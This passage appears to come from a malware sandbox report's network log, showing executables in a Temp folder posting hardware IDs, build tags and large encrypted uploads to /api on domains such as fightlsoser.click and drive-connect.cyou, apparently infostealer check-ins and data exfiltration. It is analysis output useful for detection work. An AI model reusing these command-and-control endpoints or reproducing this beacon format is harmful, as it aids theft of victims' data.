                                                                                                                                                                                                                                                2024-12-13 12:54:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                2024-12-13 12:54:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                43192.168.2.450345104.21.35.434437924C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:07 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=QHFTKF65CDRRDOYZH
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 1373
                                                                                                                                                                                                                                                Host: fightlsoser.click
                                                                                                                                                                                                                                                2024-12-13 12:54:07 UTC1373OUTData Raw: 2d 2d 51 48 46 54 4b 46 36 35 43 44 52 52 44 4f 59 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 51 48 46 54 4b 46 36 35 43 44 52 52 44 4f 59 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 48 46 54 4b 46 36 35 43 44 52 52 44 4f 59 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 4d 42 73 54 77 2d 2d 49 6e 73 74 61 6c 6c 73
                                                                                                                                                                                                                                                Data Ascii: --QHFTKF65CDRRDOYZHContent-Disposition: form-data; name="hwid"6AB8C0C3488F994123D904AF30EFEBBC--QHFTKF65CDRRDOYZHContent-Disposition: form-data; name="pid"1--QHFTKF65CDRRDOYZHContent-Disposition: form-data; name="lid"cMBsTw--Installs
                                                                                                                                                                                                                                                2024-12-13 12:54:08 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:07 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=18bvvb14vqdlal7gbkaa62hnfj; expires=Tue, 08-Apr-2025 06:40:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NH%2F1R5jqq7QOsMq5t658KBrM32ha2tr6FY7RBX4tQBCRQ2xpGZtklWSv%2FbKbMO04SQver8cD9x%2F%2FtowyvyuIdDtMKhvU3DZibrTWS8d2VIMhficpN6FF0737ncCHCGv2LPhrtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f1619d7d9b842de-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=20595&min_rtt=1701&rtt_var=11958&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2290&delivery_rate=1716637&cwnd=230&unsent_bytes=0&cid=96b49639be420eca&ts=1023&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:54:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                2024-12-13 12:54:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                44192.168.2.450351172.67.139.784435900C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:08 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=O7AXNE6LYZGO
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 18126
                                                                                                                                                                                                                                                Host: drive-connect.cyou
                                                                                                                                                                                                                                                2024-12-13 12:54:08 UTC15331OUTData Raw: 2d 2d 4f 37 41 58 4e 45 36 4c 59 5a 47 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4f 37 41 58 4e 45 36 4c 59 5a 47 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 37 41 58 4e 45 36 4c 59 5a 47 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 4f 37 41 58 4e 45 36 4c 59 5a 47 4f 0d 0a 43
                                                                                                                                                                                                                                                Data Ascii: --O7AXNE6LYZGOContent-Disposition: form-data; name="hwid"6AB8C0C3488F994123D904AF30EFEBBC--O7AXNE6LYZGOContent-Disposition: form-data; name="pid"2--O7AXNE6LYZGOContent-Disposition: form-data; name="lid"FATE99--test--O7AXNE6LYZGOC
                                                                                                                                                                                                                                                2024-12-13 12:54:08 UTC2795OUTData Raw: a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be
                                                                                                                                                                                                                                                Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
                                                                                                                                                                                                                                                2024-12-13 12:54:09 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:09 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=stut97sjbtdi48vr6rpdfchd6d; expires=Tue, 08-Apr-2025 06:40:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dFpAt1XH65zPYGb1AEgrMbVyfRzWB6rzDo1xegIvHQzJJJ6rn3H2Ig6yE%2FnzftGWzrHP7fV4mV%2FYwJDfrSkvpwU3zoSlK4X%2B7txSVnP2G9p4D0yGBpAbIjkoWsuMXxRLvhqQ%2BpU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f1619df8ac372c2-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=14709&min_rtt=2046&rtt_var=8453&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19084&delivery_rate=1427174&cwnd=164&unsent_bytes=0&cid=09aae95a451bbcae&ts=1020&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:54:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                2024-12-13 12:54:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                45192.168.2.450367172.67.139.784435900C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:13 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=MZKW5UF4HX99
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 8747
                                                                                                                                                                                                                                                Host: drive-connect.cyou
                                                                                                                                                                                                                                                2024-12-13 12:54:13 UTC8747OUTData Raw: 2d 2d 4d 5a 4b 57 35 55 46 34 48 58 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4d 5a 4b 57 35 55 46 34 48 58 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 5a 4b 57 35 55 46 34 48 58 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 4d 5a 4b 57 35 55 46 34 48 58 39 39 0d 0a 43
                                                                                                                                                                                                                                                Data Ascii: --MZKW5UF4HX99Content-Disposition: form-data; name="hwid"6AB8C0C3488F994123D904AF30EFEBBC--MZKW5UF4HX99Content-Disposition: form-data; name="pid"2--MZKW5UF4HX99Content-Disposition: form-data; name="lid"FATE99--test--MZKW5UF4HX99C
                                                                                                                                                                                                                                                2024-12-13 12:54:15 UTC1025INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:14 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=s9391q8131hisdiflm2fufv31h; expires=Tue, 08-Apr-2025 06:40:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VJrxxQPQGsXU%2F8Yfm9xlWn3HLYO2yl3jHZxyZq4Qs%2B5LxEqXWCUlKWMKPkMyzZMAq6Fkp%2BGkKliPNUOidhrAExUWetmeV%2FsMD7wJkb%2BC12fAB7UAO%2Ft1YEyiN33C6GDvYbUKEwA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f161a0158ce42d4-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2607&min_rtt=1899&rtt_var=1218&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9682&delivery_rate=1537651&cwnd=247&unsent_bytes=0&cid=270f8720fdad9d61&ts=1282&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:54:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                2024-12-13 12:54:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                46192.168.2.450376104.21.35.434437924C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:16 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=UVYAJ0I2MAI0SP6WV4
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 554264
                                                                                                                                                                                                                                                Host: fightlsoser.click
                                                                                                                                                                                                                                                2024-12-13 12:54:16 UTC15331OUTData Raw: 2d 2d 55 56 59 41 4a 30 49 32 4d 41 49 30 53 50 36 57 56 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 55 56 59 41 4a 30 49 32 4d 41 49 30 53 50 36 57 56 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 56 59 41 4a 30 49 32 4d 41 49 30 53 50 36 57 56 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 4d 42 73 54 77 2d 2d 49 6e 73 74 61
                                                                                                                                                                                                                                                Data Ascii: --UVYAJ0I2MAI0SP6WV4Content-Disposition: form-data; name="hwid"6AB8C0C3488F994123D904AF30EFEBBC--UVYAJ0I2MAI0SP6WV4Content-Disposition: form-data; name="pid"1--UVYAJ0I2MAI0SP6WV4Content-Disposition: form-data; name="lid"cMBsTw--Insta
                                                                                                                                                                                                                                                2024-12-13 12:54:16 UTC15331OUTData Raw: 7c ce 41 07 2c 49 f4 65 65 c4 5d fd db f3 6d 15 7f 32 9f 4a a2 bb 3e d6 5b ab 37 45 c5 91 3c 89 3a bc d8 e9 52 49 14 90 3b bb 1e 76 2c e8 f1 42 c3 2e c3 40 38 1b 79 87 7c 30 d6 5a 9f 03 42 0b fb 61 22 ff f4 f7 f1 73 e3 75 b6 e8 a6 a2 b3 c6 09 7b bd d6 47 0c 4c 5b 79 dd 0d 0d 5a 50 82 36 3f 0c 33 f1 37 f5 ac e4 65 59 63 b6 59 0d a2 c2 33 47 a9 73 9d 0d 0f 48 22 ec c5 f1 2b ad 62 2b 3b c5 8b e8 d9 d8 ad b3 74 bf bf c5 0b 1a 1a 6c 31 fe 8b 24 0f 70 3d 6d b7 ef d7 39 34 30 46 7b 1c 21 b9 c7 42 0e 96 a0 9c 96 0e c1 de 9c 21 81 c1 30 66 c9 80 1e 48 dd b7 78 9b 8c 8a bf 12 36 50 76 db e7 36 d3 f6 22 7e c3 3e 70 fa 35 03 35 58 ee 99 15 e4 fb 53 87 35 f7 4b 13 87 05 ef 2d 87 c5 7d 09 1b f6 28 58 01 c7 36 e1 02 d2 d3 a2 a3 67 a1 ab 6b cd cd 33 15 37 4d 49 6d b3 0c
                                                                                                                                                                                                                                                Data Ascii: |A,Iee]m2J>[7E<:RI;v,B.@8y|0ZBa"su{GL[yZP6?37eYcY3GsH"+b+;tl1$p=m940F{!B!0fHx6Pv6"~>p55XS5K-}(X6gk37MIm
                                                                                                                                                                                                                                                2024-12-13 12:54:16 UTC15331OUTData Raw: d9 86 b3 0d c8 64 6c 26 de 2c 46 81 a9 5a 19 e7 85 24 cd 2e 95 19 99 fc ac 72 fe f9 3a ef dd 68 0d 86 d0 e4 5d f5 08 ea 63 b8 ef 2a bf d4 da fc 1f 59 0d 44 b6 95 f4 77 bf 63 cf 60 b1 bb 4e 6b 18 fe 17 67 53 c5 f2 5a 32 4a b5 a4 0b 7b 82 be ef a4 16 88 99 0e 2a 1c c5 50 91 94 1c 18 a1 b1 10 73 8a 6f 6f 53 96 02 e9 9c bd e8 bd 1b c6 2a 93 dc d6 93 b4 bc 83 af 68 cc 0c 1f ec 8f fe b0 58 bc f1 0f 92 f4 9e 7a 0f ec 8c 6d bd f7 ba 9c 23 79 54 2e 2a 56 25 fc c5 70 a3 64 ba e1 09 2b 85 66 e1 8c 5e 41 01 23 63 b8 7e a2 23 bb 08 67 8f d2 6c f2 86 3a b5 92 92 7a a3 7c 6c c7 75 c2 53 b1 de 83 5f 82 88 3b 1b a9 c8 9a 7c 4d 27 2d d4 4b 26 5a 99 1e 4f 21 25 9f 35 aa 8d ec 0d 56 76 24 0f 85 20 c5 ec d2 b6 6c d9 22 97 e8 bd 8e 7d 32 f2 80 dd be a5 c2 09 d2 f5 0f b4 18 79
                                                                                                                                                                                                                                                Data Ascii: dl&,FZ$.r:h]c*YDwc`NkgSZ2J{*PsooS*hXzm#yT.*V%pd+f^A#c~#gl:z|luS_;|M'-K&ZO!%5Vv$ l"}2y
                                                                                                                                                                                                                                                2024-12-13 12:54:16 UTC15331OUTData Raw: 6b 2c 56 0f e8 6f d3 08 56 db 50 5a 9d 10 a4 12 88 a2 ed f3 cb 4a 5c 97 d5 fe be 07 b0 a8 e1 af e9 a7 0b 22 a0 ee 7a 5b e0 7f 63 49 5e 56 ce b4 11 5d 1a af fc e9 ae b5 e5 36 13 85 53 6b 95 3d bb af 2f f3 54 42 c2 ec 13 1c e6 a5 79 9f fe a4 e8 bd dc 35 b0 fc 26 74 75 f8 29 f0 3c ce 40 11 26 4f 43 9e f1 48 0b 00 19 0e df e7 05 09 ed 24 69 32 31 60 38 cc 4d fd ca e9 55 23 7b 8f c1 14 a8 fc 68 54 30 a0 82 20 89 b9 a9 e2 2a 7e d8 6a d1 65 6a a0 9a 98 eb 9e 8f 32 d9 f0 5e 97 45 44 ff af 69 e9 bf 81 3e 1f 84 a4 36 ff 77 b8 82 0d e8 3d b6 75 6f 97 c2 0c 28 f8 91 76 79 4b 82 34 76 e1 41 dc 6f 9f 6e fd 81 48 f7 22 89 17 af d2 fc db ac d1 e4 87 b0 a7 58 ac 14 bc 23 3d ec bd 3a 90 39 bd 8d d1 f3 f7 61 fd f1 5d 18 4e 24 58 97 e0 fe 71 61 ff cd 07 fe 5d 96 6b a2 4d 21
                                                                                                                                                                                                                                                Data Ascii: k,VoVPZJ\"z[cI^V]6Sk=/TBy5&tu)<@&OCH$i21`8MU#{hT0 *~jej2^EDi>6w=uo(vyK4vAonH"X#=:9a]N$Xqa]kM!
                                                                                                                                                                                                                                                2024-12-13 12:54:16 UTC15331OUTData Raw: 8a 79 9d 81 83 a9 fc 31 e7 f7 3a dd 9d 22 4b 62 40 97 f4 e7 62 17 48 b9 d1 9e af 2a ff c7 27 fc 56 6a 0c fc d0 74 3f 68 90 5c 10 ad 0b 7b be 5b 5b bd b6 34 db bd 5d 32 f6 05 33 81 da d6 2a 50 44 11 75 d0 47 0f 13 8a 18 ed 52 71 a5 b2 11 53 03 a6 ea c0 ad c8 21 95 a6 bb 6a 53 ea a1 48 73 de cd ee ac b2 7f 28 93 98 1f cc 75 17 41 a1 d6 e3 5d 2b 5b 5d 20 34 84 85 56 71 6b 80 43 cc d5 69 0b eb 7a b7 8d e3 6b 47 1f 4a f6 c5 7d fb 31 d1 ed ce d6 0b af b5 fc 38 f7 bc fa 0a a6 d7 a2 4e 02 48 d5 92 5a f9 8a 0a da 0c f9 d4 c1 0b 2a b2 b5 16 6c 21 62 43 19 dc 2d 6c 0d 62 e7 81 f1 f6 39 9b dd c4 ac 7a ce 2b f4 3d be b1 8e 47 1e a3 b5 51 51 78 8e f7 9d d8 78 54 cc f3 9a 5b d5 9e b7 29 0f 22 ed f2 fd 37 17 e3 90 dd b8 cc 35 1f 7a 2f 5c 8b 81 a7 4b 04 0d 26 df 20 02 7f
                                                                                                                                                                                                                                                Data Ascii: y1:"Kb@bH*'Vjt?h\{[[4]23*PDuGRqS!jSHs(uA]+[] 4VqkCizkGJ}18NHZ*l!bC-lb9z+=GQQxxT[)"75z/\K&
                                                                                                                                                                                                                                                2024-12-13 12:54:16 UTC15331OUTData Raw: 9c c7 55 24 82 c3 a4 a8 01 eb 98 f3 35 d3 81 7c cc 8b 10 e3 04 59 1f 05 1c f9 b0 da 04 ea 61 40 4d 7c 42 cf 42 21 51 8f 95 ce b6 02 69 1c ee 98 14 c8 1d 01 45 da 08 2e a7 7c d7 65 be bf 5e 3d 7e 68 0f 46 0d 85 40 8c 60 a4 77 62 fa b4 f1 1b 04 fe cb 3b f4 8b 5e 1d 3f 1f b0 f6 e7 1b ca fb 08 c8 29 dc 54 03 3b 38 85 c7 29 13 84 a3 6e 4a 59 35 ba 28 85 bb d0 cc 7a 8a 46 35 93 a9 e4 5e 83 5f cd dd d0 c0 e0 7d f9 3a 5c c3 d1 89 d7 5b 5d 4d e7 55 19 a7 94 40 d1 03 d7 00 b4 79 1c 67 5c 32 9c 6a 49 64 2a f7 85 05 5b ba 57 ab 68 4e 42 6e 58 90 d3 4a 32 12 2c f0 fd 61 19 18 6e 2b 34 bc 0b 0c 63 50 1f a0 a0 a3 b0 12 44 b1 8e 8a f0 5f 80 70 07 97 be e8 84 47 7a c5 09 8d a6 4d bc e7 2b db 38 34 fd 56 c4 d4 bc 2a 71 03 a9 fa ad d8 ae 12 4a 00 ee 86 6d ba 0f 8a 6f e0 19
                                                                                                                                                                                                                                                Data Ascii: U$5|Ya@M|BB!QiE.|e^=~hF@`wb;^?)T;8)nJY5(zF5^_}:\[]MU@yg\2jId*[WhNBnXJ2,an+4cPD_pGzM+84V*qJmo
                                                                                                                                                                                                                                                2024-12-13 12:54:16 UTC15331OUTData Raw: 3d 8a b6 8d cf 22 d0 4a 07 ff ec d2 de 5e a0 29 f6 ed 09 7c eb d4 a2 01 b7 c4 31 4d 02 a1 b1 5a 74 83 ac 0b f8 88 37 d7 31 b2 46 8a ee ba e9 fa 64 40 a7 60 d5 2a 22 2b a3 83 79 41 dc 46 8e 57 72 51 b8 50 ea 96 a7 60 5c d2 cc 3a 9e 8f 55 ec 55 69 f1 50 c5 29 bc 44 1c dd fb 36 63 5d b4 2c 67 af fd 24 58 76 55 8c 38 b8 ec a5 5a 1b 1d 22 b4 be 9c 45 b6 e1 e7 d0 88 b4 79 6b 2c 96 a9 dc 33 25 e4 ed 5a de da 14 55 32 61 a5 92 51 ca ba f3 d5 d4 fb 6f a7 f4 b0 f2 57 24 fb 91 15 86 30 e7 52 71 0a 8c 23 b7 19 73 03 46 2a b6 5e 98 46 27 5a 96 42 f5 4b 98 14 25 92 62 da 6d fc 82 ac 78 77 1f f5 20 b7 e5 1f fc c0 ce b7 6c 40 65 bd 6a 84 a7 51 69 d4 69 a9 c9 75 e1 bf 86 42 b3 65 a9 65 7b 5e 08 1f 09 76 d0 f5 74 09 97 da a1 01 3a 19 85 27 53 41 f2 29 90 f7 4b b9 5b a5 f9
                                                                                                                                                                                                                                                Data Ascii: ="J^)|1MZt71Fd@`*"+yAFWrQP`\:UUiP)D6c],g$XvU8Z"Eyk,3%ZU2aQoW$0Rq#sF*^F'ZBK%bmxw l@ejQiiuBee{^vt:'SA)K[
                                                                                                                                                                                                                                                2024-12-13 12:54:16 UTC15331OUTData Raw: 41 66 20 46 87 ba cf 92 54 57 93 dd e2 b6 7e 4d 93 fa 79 82 2b 0f fe cf 02 8b 56 50 f8 15 5d 66 80 a4 bd 91 85 f9 19 ed 98 45 75 d0 8f 1d c9 d7 41 56 02 4f 03 74 3e 4f d6 78 49 22 90 94 0f a5 4a d7 a6 1b 31 30 60 1b 67 74 10 61 91 ce 4b 39 25 24 d2 2f 40 1e 40 bc 95 7b 65 a2 5b c6 a1 a3 50 20 9e a6 63 88 71 be 82 fc 28 9a 8a 26 20 78 a1 ab c1 63 4a 38 48 12 dc c6 ca 0c 52 85 f8 ed 4e 3b d2 02 3e ec c7 e9 db 91 dc 2b a4 a0 10 16 bf f5 91 1e 25 46 a4 d5 7c f8 97 91 00 b7 97 a2 ad 99 64 c4 fa 99 ef c8 d3 b1 59 8f ef e4 69 1e 40 d1 55 51 9d 91 38 ec be 91 b9 9c 67 5b 72 63 34 61 bb ca 26 2b 4b 40 1a 2e 5a 20 0a f3 a6 04 56 b5 ab ed 97 2d dc b9 99 e8 c8 83 4a 0a 1e 02 72 7d 65 05 19 b9 bf b9 1d 50 1e 49 17 cd b7 65 66 71 59 49 93 95 d7 35 fb ff e9 49 1a 1c dc
                                                                                                                                                                                                                                                Data Ascii: Af FTW~My+VP]fEuAVOt>OxI"J10`gtaK9%$/@@{e[P cq(& xcJ8HRN;>+%F|dYi@UQ8g[rc4a&+K@.Z V-Jr}ePIefqYI5I
